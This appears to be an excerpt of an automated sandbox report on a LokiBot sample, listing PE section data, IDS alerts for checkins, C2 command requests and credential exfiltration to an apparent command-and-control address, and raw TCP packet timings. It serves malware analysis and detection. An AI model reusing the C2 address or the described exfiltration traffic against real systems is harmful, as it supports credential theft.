                .reloc0x840000xc0x200df66051bd0a5bd7cdac87814fafb4ca4False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_ICON0x820c80xb84PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8253052917232022
                RT_GROUP_ICON0x82c5c0x14data1.05
                RT_VERSION0x82c800x2ccdata0.4301675977653631
                DLLImport
                mscoree.dll_CorExeMain
                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                05/22/24-22:01:50.434635TCP2025381ET TROJAN LokiBot Checkin4970980192.168.2.745.61.137.215
                05/22/24-22:02:00.654651TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971780192.168.2.745.61.137.215
                05/22/24-22:02:00.654651TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971780192.168.2.745.61.137.215
                05/22/24-22:02:20.207962TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972380192.168.2.745.61.137.215
                05/22/24-22:01:47.110312TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970880192.168.2.745.61.137.215
                05/22/24-22:02:10.745956TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972080192.168.2.745.61.137.215
                05/22/24-22:02:14.011875TCP2025381ET TROJAN LokiBot Checkin4972180192.168.2.745.61.137.215
                05/22/24-22:02:10.745956TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972080192.168.2.745.61.137.215
                05/22/24-22:03:15.260799TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.745.61.137.215
                05/22/24-22:02:39.745782TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.745.61.137.215
                05/22/24-22:03:32.900181TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.745.61.137.215
                05/22/24-22:02:03.530501TCP2025381ET TROJAN LokiBot Checkin4971880192.168.2.745.61.137.215
                05/22/24-22:03:42.997268TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.745.61.137.215
                05/22/24-22:03:32.900181TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.745.61.137.215
                05/22/24-22:03:00.355563TCP2025381ET TROJAN LokiBot Checkin4973680192.168.2.745.61.137.215
                05/22/24-22:02:33.749822TCP2025381ET TROJAN LokiBot Checkin4972780192.168.2.745.61.137.215
                05/22/24-22:03:11.339177TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.745.61.137.215
                05/22/24-22:03:00.355563TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973680192.168.2.745.61.137.215
                05/22/24-22:02:39.745782TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973080192.168.2.745.61.137.215
                05/22/24-22:02:06.757643TCP2025381ET TROJAN LokiBot Checkin4971980192.168.2.745.61.137.215
                05/22/24-22:02:39.745782TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973080192.168.2.745.61.137.215
                05/22/24-22:03:22.325206TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.745.61.137.215
                05/22/24-22:02:03.530501TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971880192.168.2.745.61.137.215
                05/22/24-22:02:43.048990TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.745.61.137.215
                05/22/24-22:03:00.355563TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973680192.168.2.745.61.137.215
                05/22/24-22:02:24.001326TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972480192.168.2.745.61.137.215
                05/22/24-22:02:56.560139TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973580192.168.2.745.61.137.215
                05/22/24-22:03:39.786935TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.745.61.137.215
                05/22/24-22:03:03.962389TCP2025381ET TROJAN LokiBot Checkin4973780192.168.2.745.61.137.215
                05/22/24-22:02:10.745956TCP2025381ET TROJAN LokiBot Checkin4972080192.168.2.745.61.137.215
                05/22/24-22:02:36.928242TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972980192.168.2.745.61.137.215
                05/22/24-22:01:47.110312TCP2025381ET TROJAN LokiBot Checkin4970880192.168.2.745.61.137.215
                05/22/24-22:03:18.886669TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.745.61.137.215
                05/22/24-22:02:56.560139TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973580192.168.2.745.61.137.215
                05/22/24-22:03:15.260799TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974080192.168.2.745.61.137.215
                05/22/24-22:03:25.799709TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.745.61.137.215
                05/22/24-22:03:36.285874TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.745.61.137.215
                05/22/24-22:02:46.431591TCP2025381ET TROJAN LokiBot Checkin4973280192.168.2.745.61.137.215
                05/22/24-22:03:15.260799TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.745.61.137.215
                05/22/24-22:02:30.532619TCP2025381ET TROJAN LokiBot Checkin4972680192.168.2.745.61.137.215
                05/22/24-22:03:03.962389TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973780192.168.2.745.61.137.215
                05/22/24-22:03:25.799709TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.745.61.137.215
                05/22/24-22:03:39.786935TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.745.61.137.215
                05/22/24-22:01:50.434635TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970980192.168.2.745.61.137.215
                05/22/24-22:03:03.962389TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973780192.168.2.745.61.137.215
                05/22/24-22:02:17.236236TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972280192.168.2.745.61.137.215
                05/22/24-22:02:27.150658TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972580192.168.2.745.61.137.215
                05/22/24-22:02:03.530501TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971880192.168.2.745.61.137.215
                05/22/24-22:02:52.721787TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973480192.168.2.745.61.137.215
                05/22/24-22:02:43.048990TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.745.61.137.215
                05/22/24-22:02:52.721787TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973480192.168.2.745.61.137.215
                05/22/24-22:01:39.996238TCP2025381ET TROJAN LokiBot Checkin4970480192.168.2.745.61.137.215
                05/22/24-22:01:57.173481TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971680192.168.2.745.61.137.215
                05/22/24-22:01:43.233365TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24970780192.168.2.745.61.137.215
                05/22/24-22:01:53.733914TCP2025381ET TROJAN LokiBot Checkin4971080192.168.2.745.61.137.215
                05/22/24-22:03:11.339177TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.745.61.137.215
                05/22/24-22:01:43.233365TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14970780192.168.2.745.61.137.215
                05/22/24-22:02:49.622449TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973380192.168.2.745.61.137.215
                05/22/24-22:01:39.996238TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14970480192.168.2.745.61.137.215
                05/22/24-22:02:14.011875TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972180192.168.2.745.61.137.215
                05/22/24-22:01:39.996238TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24970480192.168.2.745.61.137.215
                05/22/24-22:03:32.900181TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.745.61.137.215
                05/22/24-22:02:33.749822TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972780192.168.2.745.61.137.215
                05/22/24-22:03:11.339177TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.745.61.137.215
                05/22/24-22:01:53.733914TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971080192.168.2.745.61.137.215
                05/22/24-22:02:14.011875TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972180192.168.2.745.61.137.215
                05/22/24-22:02:06.757643TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971980192.168.2.745.61.137.215
                05/22/24-22:02:52.721787TCP2025381ET TROJAN LokiBot Checkin4973480192.168.2.745.61.137.215
                05/22/24-22:01:53.733914TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971080192.168.2.745.61.137.215
                05/22/24-22:02:46.431591TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973280192.168.2.745.61.137.215
                05/22/24-22:02:00.654651TCP2025381ET TROJAN LokiBot Checkin4971780192.168.2.745.61.137.215
                05/22/24-22:01:50.434635TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970980192.168.2.745.61.137.215
                05/22/24-22:03:29.494079TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.745.61.137.215
                05/22/24-22:03:07.384774TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973880192.168.2.745.61.137.215
                05/22/24-22:01:47.110312TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970880192.168.2.745.61.137.215
                05/22/24-22:02:20.207962TCP2025381ET TROJAN LokiBot Checkin4972380192.168.2.745.61.137.215
                05/22/24-22:02:30.532619TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972680192.168.2.745.61.137.215
                05/22/24-22:02:46.431591TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973280192.168.2.745.61.137.215
                05/22/24-22:02:30.532619TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972680192.168.2.745.61.137.215
                05/22/24-22:02:00.654651TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971780192.168.2.745.61.137.215
                05/22/24-22:02:36.928242TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972980192.168.2.745.61.137.215
                05/22/24-22:02:20.207962TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972380192.168.2.745.61.137.215
                05/22/24-22:02:20.207962TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972380192.168.2.745.61.137.215
                05/22/24-22:02:10.745956TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972080192.168.2.745.61.137.215
                05/22/24-22:02:24.001326TCP2025381ET TROJAN LokiBot Checkin4972480192.168.2.745.61.137.215
                05/22/24-22:03:11.339177TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.745.61.137.215
                05/22/24-22:03:42.997268TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.745.61.137.215
                05/22/24-22:02:49.622449TCP2025381ET TROJAN LokiBot Checkin4973380192.168.2.745.61.137.215
                05/22/24-22:03:32.900181TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.745.61.137.215
                05/22/24-22:03:42.997268TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.745.61.137.215
                05/22/24-22:03:22.325206TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.745.61.137.215
                05/22/24-22:02:39.745782TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.745.61.137.215
                05/22/24-22:03:42.997268TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.745.61.137.215
                05/22/24-22:02:24.001326TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972480192.168.2.745.61.137.215
                05/22/24-22:03:00.355563TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973680192.168.2.745.61.137.215
                05/22/24-22:02:24.001326TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972480192.168.2.745.61.137.215
                05/22/24-22:01:43.233365TCP2025381ET TROJAN LokiBot Checkin4970780192.168.2.745.61.137.215
                05/22/24-22:03:22.325206TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.745.61.137.215
                05/22/24-22:02:03.530501TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971880192.168.2.745.61.137.215
                05/22/24-22:02:27.150658TCP2025381ET TROJAN LokiBot Checkin4972580192.168.2.745.61.137.215
                05/22/24-22:03:22.325206TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974280192.168.2.745.61.137.215
                05/22/24-22:03:18.886669TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974180192.168.2.745.61.137.215
                05/22/24-22:03:25.799709TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.745.61.137.215
                05/22/24-22:03:39.786935TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.745.61.137.215
                05/22/24-22:03:18.886669TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974180192.168.2.745.61.137.215
                05/22/24-22:03:39.786935TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.745.61.137.215
                05/22/24-22:02:56.560139TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.745.61.137.215
                05/22/24-22:02:36.928242TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972980192.168.2.745.61.137.215
                05/22/24-22:02:56.560139TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.745.61.137.215
                05/22/24-22:03:07.384774TCP2025381ET TROJAN LokiBot Checkin4973880192.168.2.745.61.137.215
                05/22/24-22:03:36.285874TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.745.61.137.215
                05/22/24-22:03:25.799709TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.745.61.137.215
                05/22/24-22:03:15.260799TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.745.61.137.215
                05/22/24-22:03:18.886669TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.745.61.137.215
                05/22/24-22:03:03.962389TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973780192.168.2.745.61.137.215
                05/22/24-22:02:52.721787TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973480192.168.2.745.61.137.215
                05/22/24-22:03:29.494079TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.745.61.137.215
                05/22/24-22:03:36.285874TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.745.61.137.215
                05/22/24-22:01:50.434635TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970980192.168.2.745.61.137.215
                05/22/24-22:02:36.928242TCP2025381ET TROJAN LokiBot Checkin4972980192.168.2.745.61.137.215
                05/22/24-22:02:17.236236TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972280192.168.2.745.61.137.215
                05/22/24-22:02:06.757643TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971980192.168.2.745.61.137.215
                05/22/24-22:02:27.150658TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972580192.168.2.745.61.137.215
                05/22/24-22:02:43.048990TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973180192.168.2.745.61.137.215
                05/22/24-22:01:57.173481TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971680192.168.2.745.61.137.215
                05/22/24-22:01:57.173481TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971680192.168.2.745.61.137.215
                05/22/24-22:02:43.048990TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973180192.168.2.745.61.137.215
                05/22/24-22:01:43.233365TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970780192.168.2.745.61.137.215
                05/22/24-22:02:27.150658TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972580192.168.2.745.61.137.215
                05/22/24-22:02:17.236236TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972280192.168.2.745.61.137.215
                05/22/24-22:02:49.622449TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973380192.168.2.745.61.137.215
                05/22/24-22:01:39.996238TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970480192.168.2.745.61.137.215
                05/22/24-22:02:17.236236TCP2025381ET TROJAN LokiBot Checkin4972280192.168.2.745.61.137.215
                05/22/24-22:02:14.011875TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972180192.168.2.745.61.137.215
                05/22/24-22:01:53.733914TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971080192.168.2.745.61.137.215
                05/22/24-22:02:06.757643TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971980192.168.2.745.61.137.215
                05/22/24-22:02:33.749822TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972780192.168.2.745.61.137.215
                05/22/24-22:02:49.622449TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973380192.168.2.745.61.137.215
                05/22/24-22:01:57.173481TCP2025381ET TROJAN LokiBot Checkin4971680192.168.2.745.61.137.215
                05/22/24-22:02:33.749822TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972780192.168.2.745.61.137.215
                05/22/24-22:03:07.384774TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973880192.168.2.745.61.137.215
                05/22/24-22:03:36.285874TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.745.61.137.215
                05/22/24-22:03:29.494079TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.745.61.137.215
                05/22/24-22:02:46.431591TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973280192.168.2.745.61.137.215
                05/22/24-22:01:47.110312TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970880192.168.2.745.61.137.215
                05/22/24-22:03:07.384774TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973880192.168.2.745.61.137.215
                05/22/24-22:02:30.532619TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972680192.168.2.745.61.137.215
                05/22/24-22:03:29.494079TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.745.61.137.215
                TimestampSource PortDest PortSource IPDest IP
                May 22, 2024 22:01:39.988970995 CEST4970480192.168.2.745.61.137.215
                May 22, 2024 22:01:39.994077921 CEST804970445.61.137.215192.168.2.7
                May 22, 2024 22:01:39.994157076 CEST4970480192.168.2.745.61.137.215
                May 22, 2024 22:01:39.996237993 CEST4970480192.168.2.745.61.137.215
                May 22, 2024 22:01:40.048659086 CEST804970445.61.137.215192.168.2.7
                May 22, 2024 22:01:40.048728943 CEST4970480192.168.2.745.61.137.215
                May 22, 2024 22:01:40.053695917 CEST804970445.61.137.215192.168.2.7
                May 22, 2024 22:01:42.994126081 CEST804970445.61.137.215192.168.2.7
                May 22, 2024 22:01:42.996242046 CEST804970445.61.137.215192.168.2.7
                May 22, 2024 22:01:42.996753931 CEST4970480192.168.2.745.61.137.215
                May 22, 2024 22:01:42.996753931 CEST4970480192.168.2.745.61.137.215
                May 22, 2024 22:01:43.001065969 CEST804970445.61.137.215192.168.2.7
                May 22, 2024 22:01:43.005872965 CEST804970445.61.137.215192.168.2.7
                May 22, 2024 22:01:43.005886078 CEST804970445.61.137.215192.168.2.7
                May 22, 2024 22:01:43.005896091 CEST804970445.61.137.215192.168.2.7
                May 22, 2024 22:01:43.005906105 CEST4970480192.168.2.745.61.137.215
                May 22, 2024 22:01:43.005938053 CEST4970480192.168.2.745.61.137.215
                May 22, 2024 22:01:43.005938053 CEST4970480192.168.2.745.61.137.215
                May 22, 2024 22:01:43.015408039 CEST804970445.61.137.215192.168.2.7
                May 22, 2024 22:01:43.019284964 CEST804970445.61.137.215192.168.2.7
                May 22, 2024 22:01:43.019305944 CEST804970445.61.137.215192.168.2.7
                May 22, 2024 22:01:43.019315004 CEST804970445.61.137.215192.168.2.7
                May 22, 2024 22:01:43.019350052 CEST4970480192.168.2.745.61.137.215
                May 22, 2024 22:01:43.019367933 CEST4970480192.168.2.745.61.137.215
                May 22, 2024 22:01:43.019367933 CEST4970480192.168.2.745.61.137.215
                May 22, 2024 22:01:43.021476984 CEST4970480192.168.2.745.61.137.215
                May 22, 2024 22:01:43.025376081 CEST804970445.61.137.215192.168.2.7
                May 22, 2024 22:01:43.025388956 CEST804970445.61.137.215192.168.2.7
                May 22, 2024 22:01:43.029516935 CEST4970480192.168.2.745.61.137.215
                May 22, 2024 22:01:43.031445026 CEST804970445.61.137.215192.168.2.7
                May 22, 2024 22:01:43.031456947 CEST804970445.61.137.215192.168.2.7
                May 22, 2024 22:01:43.031465054 CEST804970445.61.137.215192.168.2.7
                May 22, 2024 22:01:43.031546116 CEST4970480192.168.2.745.61.137.215
                May 22, 2024 22:01:43.031546116 CEST4970480192.168.2.745.61.137.215
                May 22, 2024 22:01:43.031546116 CEST4970480192.168.2.745.61.137.215
                May 22, 2024 22:01:43.225668907 CEST4970780192.168.2.745.61.137.215
                May 22, 2024 22:01:43.230861902 CEST804970745.61.137.215192.168.2.7
                May 22, 2024 22:01:43.230952978 CEST4970780192.168.2.745.61.137.215
                May 22, 2024 22:01:43.233365059 CEST4970780192.168.2.745.61.137.215
                May 22, 2024 22:01:43.283905029 CEST804970745.61.137.215192.168.2.7
                May 22, 2024 22:01:43.284064054 CEST4970780192.168.2.745.61.137.215
                May 22, 2024 22:01:43.288939953 CEST804970745.61.137.215192.168.2.7
                May 22, 2024 22:01:47.036700964 CEST804970745.61.137.215192.168.2.7
                May 22, 2024 22:01:47.038836002 CEST804970745.61.137.215192.168.2.7
                May 22, 2024 22:01:47.039061069 CEST4970780192.168.2.745.61.137.215
                May 22, 2024 22:01:47.043613911 CEST804970745.61.137.215192.168.2.7
                May 22, 2024 22:01:47.045375109 CEST4970780192.168.2.745.61.137.215
                May 22, 2024 22:01:47.048432112 CEST804970745.61.137.215192.168.2.7
                May 22, 2024 22:01:47.048445940 CEST804970745.61.137.215192.168.2.7
                May 22, 2024 22:01:47.048456907 CEST804970745.61.137.215192.168.2.7
                May 22, 2024 22:01:47.048532963 CEST4970780192.168.2.745.61.137.215
                May 22, 2024 22:01:47.048532963 CEST4970780192.168.2.745.61.137.215
                May 22, 2024 22:01:47.057940006 CEST804970745.61.137.215192.168.2.7
                May 22, 2024 22:01:47.058159113 CEST4970780192.168.2.745.61.137.215
                May 22, 2024 22:01:47.061786890 CEST804970745.61.137.215192.168.2.7
                May 22, 2024 22:01:47.061800957 CEST804970745.61.137.215192.168.2.7
                May 22, 2024 22:01:47.061811924 CEST804970745.61.137.215192.168.2.7
                May 22, 2024 22:01:47.061862946 CEST4970780192.168.2.745.61.137.215
                May 22, 2024 22:01:47.061862946 CEST4970780192.168.2.745.61.137.215
                May 22, 2024 22:01:47.061916113 CEST4970780192.168.2.745.61.137.215
                May 22, 2024 22:01:47.067787886 CEST804970745.61.137.215192.168.2.7
                May 22, 2024 22:01:47.067801952 CEST804970745.61.137.215192.168.2.7
                May 22, 2024 22:01:47.067902088 CEST4970780192.168.2.745.61.137.215
                May 22, 2024 22:01:47.073791981 CEST804970745.61.137.215192.168.2.7
                May 22, 2024 22:01:47.073803902 CEST804970745.61.137.215192.168.2.7
                May 22, 2024 22:01:47.073813915 CEST804970745.61.137.215192.168.2.7
                May 22, 2024 22:01:47.073877096 CEST4970780192.168.2.745.61.137.215
                May 22, 2024 22:01:47.073877096 CEST4970780192.168.2.745.61.137.215
                May 22, 2024 22:01:47.074234962 CEST4970780192.168.2.745.61.137.215
                May 22, 2024 22:01:47.102466106 CEST4970880192.168.2.745.61.137.215
                May 22, 2024 22:01:47.107434034 CEST804970845.61.137.215192.168.2.7
                May 22, 2024 22:01:47.107644081 CEST4970880192.168.2.745.61.137.215
                May 22, 2024 22:01:47.110311985 CEST4970880192.168.2.745.61.137.215
                May 22, 2024 22:01:47.176187992 CEST804970845.61.137.215192.168.2.7
                May 22, 2024 22:01:47.176254034 CEST4970880192.168.2.745.61.137.215
                May 22, 2024 22:01:47.182184935 CEST804970845.61.137.215192.168.2.7
                May 22, 2024 22:01:50.267817974 CEST804970845.61.137.215192.168.2.7
                May 22, 2024 22:01:50.268203974 CEST804970845.61.137.215192.168.2.7
                May 22, 2024 22:01:50.268400908 CEST4970880192.168.2.745.61.137.215
                May 22, 2024 22:01:50.268806934 CEST4970880192.168.2.745.61.137.215
                May 22, 2024 22:01:50.268959045 CEST804970845.61.137.215192.168.2.7
                May 22, 2024 22:01:50.269006968 CEST4970880192.168.2.745.61.137.215
                May 22, 2024 22:01:50.269798040 CEST804970845.61.137.215192.168.2.7
                May 22, 2024 22:01:50.269813061 CEST804970845.61.137.215192.168.2.7
                May 22, 2024 22:01:50.269824028 CEST804970845.61.137.215192.168.2.7
                May 22, 2024 22:01:50.269843102 CEST4970880192.168.2.745.61.137.215
                May 22, 2024 22:01:50.269866943 CEST4970880192.168.2.745.61.137.215
                May 22, 2024 22:01:50.271408081 CEST4970880192.168.2.745.61.137.215
                May 22, 2024 22:01:50.271435022 CEST804970845.61.137.215192.168.2.7
                May 22, 2024 22:01:50.271483898 CEST4970880192.168.2.745.61.137.215
                May 22, 2024 22:01:50.272250891 CEST804970845.61.137.215192.168.2.7
                May 22, 2024 22:01:50.272264957 CEST804970845.61.137.215192.168.2.7
                May 22, 2024 22:01:50.272291899 CEST4970880192.168.2.745.61.137.215
                May 22, 2024 22:01:50.272311926 CEST4970880192.168.2.745.61.137.215
                May 22, 2024 22:01:50.273055077 CEST804970845.61.137.215192.168.2.7
                May 22, 2024 22:01:50.273094893 CEST4970880192.168.2.745.61.137.215
                May 22, 2024 22:01:50.273380041 CEST804970845.61.137.215192.168.2.7
                May 22, 2024 22:01:50.273416996 CEST4970880192.168.2.745.61.137.215
                May 22, 2024 22:01:50.274043083 CEST804970845.61.137.215192.168.2.7
                May 22, 2024 22:01:50.274080992 CEST4970880192.168.2.745.61.137.215
                May 22, 2024 22:01:50.274697065 CEST804970845.61.137.215192.168.2.7
                May 22, 2024 22:01:50.274734974 CEST4970880192.168.2.745.61.137.215
                May 22, 2024 22:01:50.278178930 CEST804970845.61.137.215192.168.2.7
                May 22, 2024 22:01:50.278373957 CEST4970880192.168.2.745.61.137.215
                May 22, 2024 22:01:50.424673080 CEST4970980192.168.2.745.61.137.215
                May 22, 2024 22:01:50.432411909 CEST804970945.61.137.215192.168.2.7
                May 22, 2024 22:01:50.432543039 CEST4970980192.168.2.745.61.137.215
                May 22, 2024 22:01:50.434634924 CEST4970980192.168.2.745.61.137.215
                May 22, 2024 22:01:50.447447062 CEST804970945.61.137.215192.168.2.7
                May 22, 2024 22:01:50.447763920 CEST4970980192.168.2.745.61.137.215
                May 22, 2024 22:01:50.462666988 CEST804970945.61.137.215192.168.2.7
                May 22, 2024 22:01:53.568820953 CEST804970945.61.137.215192.168.2.7
                May 22, 2024 22:01:53.571342945 CEST804970945.61.137.215192.168.2.7
                May 22, 2024 22:01:53.571441889 CEST4970980192.168.2.745.61.137.215
                May 22, 2024 22:01:53.571569920 CEST4970980192.168.2.745.61.137.215
                May 22, 2024 22:01:53.578866959 CEST804970945.61.137.215192.168.2.7
                May 22, 2024 22:01:53.578962088 CEST4970980192.168.2.745.61.137.215
                May 22, 2024 22:01:53.582813025 CEST804970945.61.137.215192.168.2.7
                May 22, 2024 22:01:53.582827091 CEST804970945.61.137.215192.168.2.7
                May 22, 2024 22:01:53.582840919 CEST804970945.61.137.215192.168.2.7
                May 22, 2024 22:01:53.582853079 CEST804970945.61.137.215192.168.2.7
                May 22, 2024 22:01:53.582900047 CEST4970980192.168.2.745.61.137.215
                May 22, 2024 22:01:53.582900047 CEST4970980192.168.2.745.61.137.215
                May 22, 2024 22:01:53.582943916 CEST4970980192.168.2.745.61.137.215
                May 22, 2024 22:01:53.582973957 CEST4970980192.168.2.745.61.137.215
                May 22, 2024 22:01:53.594297886 CEST804970945.61.137.215192.168.2.7
                May 22, 2024 22:01:53.594357014 CEST4970980192.168.2.745.61.137.215
                May 22, 2024 22:01:53.598608971 CEST804970945.61.137.215192.168.2.7
                May 22, 2024 22:01:53.598623991 CEST804970945.61.137.215192.168.2.7
                May 22, 2024 22:01:53.598635912 CEST804970945.61.137.215192.168.2.7
                May 22, 2024 22:01:53.598685980 CEST4970980192.168.2.745.61.137.215
                May 22, 2024 22:01:53.598706007 CEST4970980192.168.2.745.61.137.215
                May 22, 2024 22:01:53.598706007 CEST4970980192.168.2.745.61.137.215
                May 22, 2024 22:01:53.606991053 CEST804970945.61.137.215192.168.2.7
                May 22, 2024 22:01:53.607006073 CEST804970945.61.137.215192.168.2.7
                May 22, 2024 22:01:53.607064962 CEST4970980192.168.2.745.61.137.215
                May 22, 2024 22:01:53.615391970 CEST804970945.61.137.215192.168.2.7
                May 22, 2024 22:01:53.615408897 CEST804970945.61.137.215192.168.2.7
                May 22, 2024 22:01:53.615462065 CEST4970980192.168.2.745.61.137.215
                May 22, 2024 22:01:53.615480900 CEST4970980192.168.2.745.61.137.215
                May 22, 2024 22:01:53.720809937 CEST4971080192.168.2.745.61.137.215
                May 22, 2024 22:01:53.731676102 CEST804971045.61.137.215192.168.2.7
                May 22, 2024 22:01:53.731795073 CEST4971080192.168.2.745.61.137.215
